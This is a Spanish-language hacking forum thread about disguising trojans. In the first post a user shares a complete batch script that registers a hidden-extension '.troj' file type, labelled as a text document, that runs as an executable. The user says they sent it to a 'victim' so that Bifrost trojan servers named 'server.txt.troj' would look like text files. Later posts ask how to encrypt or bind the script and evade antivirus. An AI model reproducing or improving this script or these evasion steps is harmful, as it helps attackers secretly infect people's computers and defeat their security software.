Buenas a todos, me he estado leyendo un post del brujo sobre la ocultacion de troyanos
http://foro.elhacker.net/index.php/topic,248.0.html

Yo abri el bloc de notas y copie este codigo bat:

@echo off
@echo REGEDIT4>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\.troj]>>%TEMP%\troj.reg
@echo @="trojfile">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile]>>%TEMP%\troj.reg
@echo @="Documento de texto">>%TEMP%\troj.reg
@echo "NeverShowExt"="">>%TEMP%\troj.reg
@echo [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command]>>%TEMP%\troj.reg
@echo@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00>>%TEMP%\troj.reg
regedit /s %TEMP%\troj.reg
del %TEMP%\troj.reg

lo guarde como troj.bat, y se lo envie a mi victima y lo acepto y lo ejecuto, ahora le envio los "servers" creados por el bifrost despues de compilarlos en formato server.txt.troj, considerando que ahora el .troj en el pc de la victima es considerado ejecutable..
Esta bien hecho?????He seguido bien los pasos???? GRACIAS

Pues lo q se supone q hace (q no lo e provado) es crear una nueva extension en el reg q siempre este oculta y q sea ejecutable (como un exe) asi si tu llamas a tu server server.txt.troj en el otro pc aparecera como un archivo del block de notas cuando en realidad es un ejecutable, y se infectara claro xDD

haaa... le voy agarrando la mano... (al tema, no??? jaja XD), Una preg tonta... Como hago esa extensión .txt.troj??? si es muy tonta no la respondan 
a quien le doy esa extensión, al troyano despues de ser compilado o a otro archivo??

Y gracias por haberme explicado, a ambos 


SALUD.O.S

Muchisimas gracias!!! "Smoke=Hack", ya lo entendi pero te queria preguntar que si se puede encryptar el archivo bat y si se puede adjuntar con otro archivo?? Si no?? XD bueno, si èl ejecuta el BAT, no lo detecta el antivirus???


SALUD.O.S

A mi la verdad este metodo siempre me parecio un poco chorrada.. si ya tienes q embiar un ejecutable (y q lo ejecuten) para despues mandar un exe, por q no enviar directamente el exe y ya haces lo q kieres?

hola muy buenas a todos,bueno la verdad que escribo porque tengo la picha hecha un lio.......veran,tengo el bifrost desde hace una semana mas o menos y me eh metido en cantidad de paginas  y foros  para ilustrarme un poco sobre este mundo de los troyanos y cada ves que innto muchas de las cosas que dicen a mi no me funciona,ya puede ser porque el link de alguna pagina esta rota,en construcion,o me manda a alcarajo,porque me salen paginas de flores,contactos etc etc etc,bueno mis preguntas son las siguientes....¿ahi algun binder,joiner o camuflador(lo mismo) que sea indetectable?(que lo dudo)si es asi en donde lo puedo conseguir...no os lo tomeis a mal,no quiero llegar y besar el santo,eh buscado en cantidad de sitios incluido aqui,y la informacion e buenisima lo que pasa(leer mas arriba ya lo dije).bueno otra pregunta¿he leido que cuando se manda un server,del troyano que sea,pues al abrirlo la victima,me refiero al paquete,pues los antivirus lo captan,aunque tengan cifrado el server,¿pregunta........se puede hacer invisible el paquete que mandas,encriptandolo me refiero,para que al abrirlo el AV no lo detecte y pase desapersibido?¿cuantos programas se an de utilizar para poder llegar a hacer eso(si es que se puede?bueno y esto como comentario personal,al descargarme tanto el cactus joiner,como el fire joiner,entre otros....porque me sale una pantalla de error(perdon por no decir que clase de error es)y no me deja instalar ese programa...bueno antes de despedirme,eh de decir que perdonen si os he molestado,no es mi intension,pido disculpas por las posibles faltas ortograficas y por ser tan pesado,escribiendo este manuscrito,pero es que por mas que busco me dan mas ganas de mandar al carajo todo y con perdon,bueno ahora si qe me despido,un saludo para todos y espero que almenos alguien me diga algo,cualkier cosa me vale,PD.......disculpen y gracias de ante mano.